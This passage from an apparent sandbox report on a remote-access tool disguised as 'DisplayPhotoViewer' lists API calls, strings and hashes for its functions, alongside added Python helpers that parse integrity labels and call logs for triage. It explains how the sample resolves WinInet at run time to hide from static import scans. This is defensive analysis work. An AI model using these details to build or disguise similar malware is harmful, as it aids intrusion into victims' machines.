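    if lab is None or "NO_WRITE_UP" not in lab[2]:
        return None
    return lab[0]


if __name__ == "__main__":
    SAMPLE = "S:(ML;;NW;;;LW)"                    # from the report's String ID list
    CONSTRUCTED = "D:(A;;GA;;;WD)S:(ML;;NWNR;;;ME)"  # constructed for comparison
    for s in (SAMPLE, CONSTRUCTED):
        print(s, "->", mandatory_label(s), "lowest writer:", lowest_writer(s))
```

Run against the report's string the helper answers "Low": anything running at Low integrity or above may write to the sample's IPC objects if the DACL permits, which is the check to make before assuming the RAT's control channel is reachable only from Medium-integrity code.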

                                                                                                    Control-flow Graph
                                                                                                    • Graph for the function at 11028090 (blocks 11028090-110286c3; the sandbox's node/edge list is not reproduced). External calls on its paths: LoadLibraryA, GetProcAddress, InternetCloseHandle, SetLastError, _free, InternetOpenA, GetLastError, InternetConnectA, GetDesktopWindow, FreeLibrary. Internal calls: 111583b1, 11138650, 11159650, 1107d140, 110265b0, 11107820, 11026560, 110ca1f0, 11157121.
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll,218EC38C,74DF23A0,?,00000000), ref: 110280C5
                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102815F
                                                                                                    • InternetCloseHandle.WININET(000000FF), ref: 1102816D
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028173
                                                                                                    • _malloc.LIBCMT ref: 11028197
                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110281B1
                                                                                                    • GetLastError.KERNEL32 ref: 110281D2
                                                                                                    • _free.LIBCMT ref: 110281DE
                                                                                                    • _malloc.LIBCMT ref: 110281E7
                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11028201
                                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102823B
                                                                                                    • InternetOpenA.WININET(11189200,?,?,000000FF,00000000), ref: 1102825A
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028264
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028271
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102827B
                                                                                                    • _free.LIBCMT ref: 11028285
                                                                                                      • Part of subcall function 11158445: HeapFree.KERNEL32(00000000,00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115845B
                                                                                                      • Part of subcall function 11158445: GetLastError.KERNEL32(00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115846D
                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11028305
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102831E
                                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11028331
                                                                                                    • InternetConnectA.WININET(000000FF,1118E468,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102834E
                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102836A
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028383
                                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110283A9
                                                                                                    • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110283FD
                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11028563
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028630
                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11028682
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11028699
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 110286AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorLast$Internet$FreeLibrary_free_malloc$CloseConnectHandleHeapLoadOpen
                                                                                                    • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                    • API String ID: 3053051410-913974648
                                                                                                    • Opcode ID: 9f7c83f99a8e9644367707dfacec3b69a1d60b86e7a6490af2cdb74f6cdce43c
                                                                                                    • Instruction ID: c0ebd284535d67ffb73796bde1d7fb53ff0c0bfd9c70396314c475a34027a813
                                                                                                    • Opcode Fuzzy Hash: 9f7c83f99a8e9644367707dfacec3b69a1d60b86e7a6490af2cdb74f6cdce43c
                                                                                                    • Instruction Fuzzy Hash: AF1271B4E402659BDB11CFA9CC88A9EFBF5FF88304F60855AF855E7244EB705A40CB61
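The API list above shows the HTTP client being assembled at run time: LoadLibraryA(WinInet.dll), every WinInet export resolved by name through GetProcAddress, and SetLastError(0x78) on each failed lookup, 0x78 being ERROR_CALL_NOT_IMPLEMENTED (120). The InternetConnectA arguments pin the server port to 0x50 (80) and dwService to 3 (INTERNET_SERVICE_HTTP). Two caveats when reading such a list: the server-name pointer 1118E468 is not resolved by the sandbox, so the host cannot be recovered from these lines, and the 000000FF handle values and "?" entries are what the sandbox recorded, not meaningful handles. The script below is an added triage helper, not code from the report or from the sample: it parses call lines in the report's format into a capability summary. Its sample input is copied from the list above, and the WinInet and Win32 constants are the documented values.

```python
"""Turn Joe Sandbox API-call lines into a capability summary for a function
that resolves WinInet at run time.

Added example for this report, not the sample's code.  REPORT_LINES is
copied from the report's API list for the function at 11028090."""
import re

API_LINE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<module>\w+)"      # e.g. InternetConnectA.WININET
    r"(?:\((?P<args>[^)]*)\))?"               # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")     # call-site address

INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER",
                    3: "INTERNET_SERVICE_HTTP"}
WIN32_ERROR = {0x78: "ERROR_CALL_NOT_IMPLEMENTED"}     # 120 decimal

REPORT_LINES = """\
• LoadLibraryA.KERNEL32(WinInet.dll,218EC38C,74DF23A0,?,00000000), ref: 110280C5
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102815F
• InternetCloseHandle.WININET(000000FF), ref: 1102816D
• SetLastError.KERNEL32(00000078), ref: 11028173
• _malloc.LIBCMT ref: 11028197
• GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110281B1
• GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102823B
• InternetOpenA.WININET(11189200,?,?,000000FF,00000000), ref: 1102825A
  • Part of subcall function 11158445: HeapFree.KERNEL32(00000000,00000000,?), ref: 1115845B
• GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11028331
• InternetConnectA.WININET(000000FF,1118E468,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102834E
• GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110283A9
• GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110283FD
• GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11028563
• FreeLibrary.KERNEL32(?), ref: 110286AA
"""


def parse_api_lines(text):
    """One dict per top-level call line; 'Part of subcall' lines do not
    match the pattern (the bullet is not followed by API.MODULE) and are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["module"],
                      "args": args, "ref": int(m["ref"], 16)})
    return calls


def _hex(arg):
    """Sandbox argument -> int, or None for '?' (value not recovered)."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def summarize_wininet(calls):
    """Library loaded, exports resolved by name, server port/service from
    InternetConnectA, and the error code planted on lookup failure."""
    summary = {"library": None, "dynamic_imports": [], "server_port": None,
               "service": None, "failure_error": None}
    for c in calls:
        api, args = c["api"], c["args"]
        if api == "LoadLibraryA" and args:
            summary["library"] = args[0]
        elif api == "GetProcAddress" and len(args) == 2:
            if args[1] not in summary["dynamic_imports"]:
                summary["dynamic_imports"].append(args[1])
        elif api == "InternetConnectA" and len(args) >= 6:
            # InternetConnectA(hInternet, lpszServerName, nServerPort,
            #                  lpszUserName, lpszPassword, dwService, dwFlags, dwContext)
            summary["server_port"] = _hex(args[2])
            service = _hex(args[5])
            summary["service"] = INTERNET_SERVICE.get(service, service)
        elif api == "SetLastError" and args:
            code = _hex(args[0])
            summary["failure_error"] = WIN32_ERROR.get(code, code)
    return summary


if __name__ == "__main__":
    for key, value in summarize_wininet(parse_api_lines(REPORT_LINES)).items():
        print(f"{key}: {value}")
```

The resolved-by-name list (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetQueryDataAvailable, InternetQueryOptionA, InternetCloseHandle) is the same set that appears in the String ID line, which is why a static import scan of this module shows no WinInet dependency while the strings do.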
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B180: GetLastError.KERNEL32(?,0BA6C1B8,000000FF,0BA62AB0), ref: 1113B1B5
                                                                                                      • Part of subcall function 1113B180: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0BA6C1B8,000000FF,0BA62AB0), ref: 1113B1C5
                                                                                                    • _fgets.LIBCMT ref: 1105DEE2
                                                                                                    • _strpbrk.LIBCMT ref: 1105DF49
                                                                                                    • _fgets.LIBCMT ref: 1105E04C
                                                                                                    • _strpbrk.LIBCMT ref: 1105E0C3
                                                                                                    • __wcstoui64.LIBCMT ref: 1105E0DC
                                                                                                    • _fgets.LIBCMT ref: 1105E155
                                                                                                    • _strpbrk.LIBCMT ref: 1105E17B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                    • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                    • API String ID: 716802716-1571441106
                                                                                                    • Opcode ID: 18b8d24e5b7d5bf9ed1c4d73fb00bd4be7562dfedbb41e30b8b76f30ca7c4587
                                                                                                    • Instruction ID: 740d06254583a6c1cca6c21937a67a7fef5d8953ebadc693a9e743206bd6f065
                                                                                                    • Opcode Fuzzy Hash: 18b8d24e5b7d5bf9ed1c4d73fb00bd4be7562dfedbb41e30b8b76f30ca7c4587
                                                                                                    • Instruction Fuzzy Hash: B3A2C375E0066A9FDB91CB64DC44BEFF7B5AB45305F0081D9E889A7280EB30AE45CF61

                                                                                                    Control-flow Graph
                                                                                                    • Graph for the function at 11130aa0 (blocks 11130aa0-11131021; the sandbox's node/edge list is not reproduced). External calls on its paths: IsWindow, IsWindowVisible, GetForegroundWindow, EnableWindow, SetForegroundWindow, FindWindowA, IsIconic, GetLastError, plus a number of internal subroutines (11027e30, 1112baf0, 1112b5d0, 11130640, 1113c600, 11059e50, 11129200, 111395a0, 11157121 and others).
APIs
• IsWindow.USER32(0006029E), ref: 11130B21
• IsWindowVisible.USER32(0006029E), ref: 11130B2F
• IsWindowVisible.USER32(0006029E), ref: 11130B67
• GetForegroundWindow.USER32 ref: 11130B82
• EnableWindow.USER32(0006029E,00000000), ref: 11130B9C
• EnableWindow.USER32(0006029E,00000001), ref: 11130BB8
• SetForegroundWindow.USER32(00000000), ref: 11130BC7
• FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11130C05
• IsWindowVisible.USER32(00000000), ref: 11130C14
• IsWindowVisible.USER32(0006029E), ref: 11130C44
• IsIconic.USER32(0006029E), ref: 11130C51
• GetForegroundWindow.USER32 ref: 11130C5B
  • Part of subcall function 11129200: ShowWindow.USER32(0006029E,11130A72,?,11130A72,00000007,?,?,?,?,?,00000000), ref: 1112920E
• SetForegroundWindow.USER32(00000000), ref: 11130C81
• EnableWindow.USER32(0006029E,00000001), ref: 11130C90
• GetLastError.KERNEL32 ref: 11130D4F
• GetLastError.KERNEL32 ref: 11130DC7
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundVisible$Enable$ErrorLast$FindIconicShow
• String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$Reactivate main window$Shell_TrayWnd$disableRunplugin
• API String ID: 3497382234-2745087410
• Opcode ID: 611af14f7b95485e78530a32c452103eadf0fe65c8cf43b16ac1f6c431f849a9
• Instruction ID: 0b031c71293b8b8f0464ad689393229bc990e381230d2831e5b33f1e3b0a5d11
• Opcode Fuzzy Hash: 611af14f7b95485e78530a32c452103eadf0fe65c8cf43b16ac1f6c431f849a9
• Instruction Fuzzy Hash: D9D11378A526219FE712DFE4CD84B7EF7A5EBC071EF000178E91457288EB716840CBA1
APIs
• CoInitialize.OLE32(00000000), ref: 1110DF75
• CoCreateInstance.OLE32(111B431C,00000000,00000001,111B432C,00000000,?,00000000,Client,silent,00000000,00000000,?,110490FB), ref: 1110DF8F
• LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 1110DFB4
• GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 1110DFC6
• SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 1110DFD9
• FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 1110DFE5
• CoUninitialize.OLE32(00000000), ref: 1110E081
Strings
Yara matches
Similarity
• API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
• String ID: SHELL32.DLL$SHGetSettings
• API String ID: 4195908086-2348320231
• Opcode ID: 6fbccb74453ebec1787b50326cc5eeaba8f0eca116b3d08528add7d2c6ecbbdc
• Instruction ID: ba3c6776d0729064969c19f3645f0374f756f5dea8bb0d64cb3e8dea25d93473
• Opcode Fuzzy Hash: 6fbccb74453ebec1787b50326cc5eeaba8f0eca116b3d08528add7d2c6ecbbdc
• Instruction Fuzzy Hash: A0514C71E00216AFDB00DFA6D9C4AAFFBB9EF88304F118569E915A7244DB31A941CB61
APIs
Strings
Yara matches
Similarity
• API ID: _memset
• String ID: NBCTL32.DLL$_License$serial_no
• API String ID: 2102423945-35127696
• Opcode ID: 653bb77b455b6c18b27f7df18132fb675e900917e9aa25ac55e5b203bfc1ca89
• Instruction ID: c6264eba9f14969d287a78ceefe44932d8c6770fa42137e5d81bf52cd27c0966
• Opcode Fuzzy Hash: 653bb77b455b6c18b27f7df18132fb675e900917e9aa25ac55e5b203bfc1ca89
• Instruction Fuzzy Hash: A5B19175A00619AFEB14CF98DC81FEEB7F9FF88304F148169E9099B295D674AD01CB90
APIs
• SetUnhandledExceptionFilter.KERNEL32(1102CD20,?,00000000), ref: 1102F694
Strings
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID: Client32$NSMWClass$NSMWClass
• API String ID: 3192549508-611217420
• Opcode ID: ba2122a7ab9d6f1fd2cf2d33c3ee7d0838d4c9a0c4a5ebf5af100f2b22473edd
• Instruction ID: 3a4bcc9f6bd7397bd32ddb8e72587a4daf11e26b451f674d4af64f86ab577af0
• Opcode Fuzzy Hash: ba2122a7ab9d6f1fd2cf2d33c3ee7d0838d4c9a0c4a5ebf5af100f2b22473edd
• Instruction Fuzzy Hash: 5CF06234E112269BC306DFE9C8D4A5EFBA0FB4434CB108179E51587359EB71B9048B56
APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,0BA671C0,00000000), ref: 11099628
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11099644
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0796E970,0796E970,0796E970,0796E970,0796E970,0796E970,0796E970,111E2704,?,00000001,00000001), ref: 11099670
• EqualSid.ADVAPI32(?,0796E970,?,00000001,00000001), ref: 11099683
Yara matches
Similarity
• API ID: InformationToken$AllocateEqualInitialize
• String ID:
• API String ID: 1878589025-0
• Opcode ID: fcd88f57a71a988521b8b08dbd2086078f309af80604b73771dfb9e416257057
• Instruction ID: 6bd8eb4c4cad34c55da363dbc0f21a698628fa77646de1f7df69030cc6c4b31d
• Opcode Fuzzy Hash: fcd88f57a71a988521b8b08dbd2086078f309af80604b73771dfb9e416257057
• Instruction Fuzzy Hash: DB214131B1111AAFEB00CFA5DC91FFEB7B8EB48704F404069E919E7280EB71A905C7A1
APIs
• GetCurrentProcess.KERNEL32(000F01FF,?,1102E7AA,00000000,00000000,00080000,218EC38C,00080000,00000000,00000000), ref: 1109815D
• OpenProcessToken.ADVAPI32(00000000), ref: 11098164
• LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 11098175
• AdjustTokenPrivileges.KERNELBASE(00000000), ref: 11098199
Yara matches
Similarity
• API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID:
• API String ID: 2349140579-0
• Opcode ID: 9ee9ec285ba56b4d44a54cb517bcb8e89d4fefe5617a925a881260382dd7a429
• Instruction ID: 376e0fcdbf336b5c88d9a2b68030271aaf7df2d0e86e7052954bc46407278919
• Opcode Fuzzy Hash: 9ee9ec285ba56b4d44a54cb517bcb8e89d4fefe5617a925a881260382dd7a429
• Instruction Fuzzy Hash: E6011EB2600219ABD710DF98DC89BAEF7BCEF44705F10456DFA1597284D7B0AA04CBB1
APIs
• AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,110994F0,00000244,cant create events), ref: 110981DC
• CloseHandle.KERNEL32(?,00000000,110994F0,00000244,cant create events), ref: 110981E5
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 81990902-0
                                                                                                    • Opcode ID: dd6f65fc7ddd526b4117c398a96d909ec16d80eb71b10002a495610badfbb40c
                                                                                                    • Instruction ID: 1728187298f114f26f6db0e234b74eee7761e16ffd30fc9c94aeb24f42928b38
                                                                                                    • Opcode Fuzzy Hash: dd6f65fc7ddd526b4117c398a96d909ec16d80eb71b10002a495610badfbb40c
                                                                                                    • Instruction Fuzzy Hash: 4BE0EC71210214ABE738CE24AC94FA777ECAF04B01F21495EFD56E6284CA60E9408B64
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • GetSystemMetrics.USER32(00002000), ref: 1102D064
                                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102D225
                                                                                                      • Part of subcall function 11108440: GetCurrentThreadId.KERNEL32 ref: 111084D6
                                                                                                      • Part of subcall function 11108440: InitializeCriticalSection.KERNEL32(-00000010,?,1102F5F3,00000001,00000000), ref: 111084E9
                                                                                                      • Part of subcall function 11108440: InitializeCriticalSection.KERNEL32(111E4480,?,1102F5F3,00000001,00000000), ref: 111084F8
                                                                                                      • Part of subcall function 11108440: EnterCriticalSection.KERNEL32(111E4480,?,1102F5F3), ref: 1110850C
                                                                                                      • Part of subcall function 11108440: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F5F3), ref: 11108532
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D261
                                                                                                    • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102D289
                                                                                                    • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102D546
                                                                                                      • Part of subcall function 11090450: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102D2B8,00000000,?,00000100,00000000,00000000,00000000), ref: 1109046C
                                                                                                      • Part of subcall function 11090450: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102D2B8,00000000,?,00000100,00000000,00000000,00000000), ref: 11090479
                                                                                                      • Part of subcall function 11090450: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 110904A9
                                                                                                    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102D2E8
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102D2F4
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1102D30C
                                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102D319
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D33B
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102D096
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • LoadIconA.USER32(11000000,000004C1), ref: 1102D6D1
                                                                                                    • LoadIconA.USER32(11000000,000004C2), ref: 1102D6E1
                                                                                                    • DestroyCursor.USER32(00000000), ref: 1102D70A
                                                                                                    • DestroyCursor.USER32(00000000), ref: 1102D71E
                                                                                                    • GetVersion.KERNEL32(?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DC4F
                                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DCA2
                                                                                                    • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,00000000,?,?,View,Client), ref: 1102E1B4
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E1EE
                                                                                                    • DispatchMessageA.USER32(?), ref: 1102E1F8
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E20A
                                                                                                    • CloseHandle.KERNEL32(00000000,Function_00025F90,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102E4A5
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102E4DA
                                                                                                    • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,00000000), ref: 1102E4E1
                                                                                                    • SetWindowPos.USER32(0006029E,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102E511
                                                                                                    • CloseHandle.KERNEL32(00000000,11055D40,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102E58F
                                                                                                    • wsprintfA.USER32 ref: 1102E6F4
                                                                                                      • Part of subcall function 11025F00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025F2A
                                                                                                      • Part of subcall function 11025F00: TranslateMessage.USER32(?), ref: 11025F40
                                                                                                      • Part of subcall function 11025F00: DispatchMessageA.USER32(?), ref: 11025F46
                                                                                                      • Part of subcall function 1102BC80: InterlockedIncrement.KERNEL32(111E1058), ref: 1102BCD2
                                                                                                      • Part of subcall function 1102BC80: Sleep.KERNEL32(0000EA60), ref: 1102BCF5
                                                                                                      • Part of subcall function 1102BC80: GetCurrentProcess.KERNEL32(00000020), ref: 1102BCFB
                                                                                                      • Part of subcall function 1102BC80: SetPriorityClass.KERNEL32(00000000), ref: 1102BD02
                                                                                                      • Part of subcall function 1102BC80: SetEvent.KERNEL32(00000BE8), ref: 1102BD31
                                                                                                    • PostMessageA.USER32(NSMWControl32,00000000,Default,Client,UseIPC,00000001,00000000), ref: 1102E7EB
                                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E7FF
                                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E825
                                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E84B
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$Process$Window$CloseHandlePost$CriticalCurrentEventOpenSectionThreadwsprintf$ClassCreateCursorDestroyDispatchFindIconInitializeLoadPeekPrioritySleepTokenVersion$EnterErrorExitIncrementInterlockedLastMetricsObjectSendSingleSystemTranslateWait_malloc_memset
                                                                                                    • String ID: *BeepSound$*BeepUsingSpeaker$*PriorityClass$*ScreenScrape$*StartupDelay$910646$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$License Control Internal Error$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V11.41.14$V12.01.14$View$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows 